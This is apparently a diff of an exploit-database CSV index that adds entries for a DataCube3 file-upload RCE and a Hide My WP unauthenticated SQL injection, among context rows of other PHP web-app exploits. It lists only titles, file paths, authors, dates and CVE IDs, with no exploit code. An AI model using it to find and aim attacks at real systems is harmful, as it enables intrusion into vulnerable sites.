 18293,exploits/php/webapps/18293.txt,"Akiva WebBoard 8.x - SQL Injection",2011-12-30,"Alexander Fuchs",webapps,php,,2011-12-30,2011-12-30,1,OSVDB-86023;CVE-2011-5204;CVE-2011-5203;OSVDB-78069,,,,,
 10924,exploits/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross-Site Scripting",2010-01-02,indoushka,webapps,php,,2010-01-01,,1,,,,,,
@@ -16719,6 +16723,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45807,exploits/php/webapps/45807.txt,"Data Center Audit 2.6.2 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comdata_center_audit_v262.zip,
 45831,exploits/php/webapps/45831.txt,"Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,,2018-11-13,2018-11-13,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comdata_center_audit_v262.zip,
 15249,exploits/php/webapps/15249.txt,"Data/File - upload and Management Arbitrary File Upload",2010-10-14,saudi0hacker,webapps,php,,2010-10-14,2010-10-14,1,,,,,http://www.exploit-db.comUploadManagemnt23205.zip,
+51868,exploits/php/webapps/51868.txt,"DataCube3 v1.0 - Unrestricted file upload 'RCE'",2024-03-10,"Samy Younsi - NS Labs",webapps,php,,2024-03-10,2024-03-10,0,CVE-2024-25832;CVE-2024-25830,,,,,
 17367,exploits/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,webapps,php,,2011-06-07,2011-06-07,1,,,,,,
 34418,exploits/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting",2010-08-06,MustLive,webapps,php,,2010-08-06,2014-08-26,1,,,,,,https://www.securityfocus.com/bid/42282/info
 32226,exploits/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",webapps,php,,2008-08-12,2014-03-13,1,CVE-2008-4439;OSVDB-48829,,,,,https://www.securityfocus.com/bid/30659/info
@@ -19524,6 +19529,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49667,exploits/php/webapps/49667.txt,"Hestia Control Panel 1.3.2 - Arbitrary File Write",2021-03-18,"numan türle",webapps,php,,2021-03-18,2021-03-18,0,,,,,,
 34072,exploits/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,webapps,php,,2010-06-01,2014-07-15,1,,,,,,https://www.securityfocus.com/bid/40509/info
 12839,exploits/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,webapps,php,,2010-05-31,,0,,,,,http://www.exploit-db.comHexjector_v1.0.7.2.zip,
+51871,exploits/php/webapps/51871.txt,"Hide My WP < 6.2.9 - Unauthenticated SQLi",2024-03-10,"Xenofon Vassilakopoulos",webapps,php,,2024-03-10,2024-03-10,0,CVE-2022-4681,,,,,
 41044,exploits/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",webapps,php,,2017-01-14,2017-01-14,0,,,,,,
 5981,exploits/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Remote File Inclusion",2008-06-30,"Ghost Hacker",webapps,php,,2008-06-29,2016-12-14,1,OSVDB-46636;CVE-2008-3127,,,,http://www.exploit-db.comHBR_1_3.zip,
 6168,exploits/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin",2008-07-30,Stack,webapps,php,,2008-07-29,2016-12-21,1,,,,,http://www.exploit-db.comHBS_2_0.zip,